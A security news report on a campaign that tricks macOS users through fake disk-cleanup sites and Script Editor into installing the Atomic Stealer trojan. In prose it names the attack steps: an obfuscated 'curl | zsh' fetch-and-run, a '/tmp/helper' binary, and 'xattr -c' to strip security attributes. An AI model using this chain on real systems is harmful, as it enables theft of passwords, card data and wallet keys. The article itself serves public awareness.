Security researchers have uncovered an escalating campaign targeting macOS users. By abusing the built-in 'Script Editor' application, attackers are successfully bypassing certain terminal command restrictions to plant the Atomic Stealer (AMOS) info-stealing trojan on victim devices.
Attack Chain Disguised as Disk Cleanup Tools
According to a report from the Jamf security team, attackers typically set up fraudulent Apple-themed websites that claim to help users resolve low disk space issues. These sites are designed to look highly professional, providing seemingly legitimate system cleanup steps that entice users to click on specific links.
Unlike previous attack methods that required users to manually type commands into the Terminal, this variant exploits the 'applescript://' protocol. When a user clicks a button on the page, the system automatically launches the Script Editor and loads pre-configured malicious instructions. These scripts use an obfuscated 'curl | zsh' command to download and execute the malicious payload directly into the system's memory.
Researchers noted that the malware performs a series of complex pre-processing steps, including decoding Base64 payloads, downloading a binary file named '/tmp/helper,' and using the 'xattr -c' command to strip security attributes, ultimately establishing persistence on the target system.
Atomic Stealer is a prominent 'Malware-as-a-Service' (MaaS) product that has been widely used in various 'ClickFix' attacks in recent years. Once installed, the trojan quickly harvests Keychain data, browser-stored passwords, autofill information, credit card details, and cryptocurrency wallet private keys.
Furthermore, the malware includes backdoor functionality, granting attackers persistent access to the compromised device. While Apple introduced terminal warning mechanisms against ClickFix attacks in macOS 15.1, this new method of utilizing the Script Editor demonstrates that hackers are constantly refining their tactics to evade system defenses.
Security experts advise users to remain highly vigilant and avoid executing any Script Editor prompts originating from unknown websites. If system maintenance or troubleshooting is required, always rely exclusively on official Apple technical documentation.
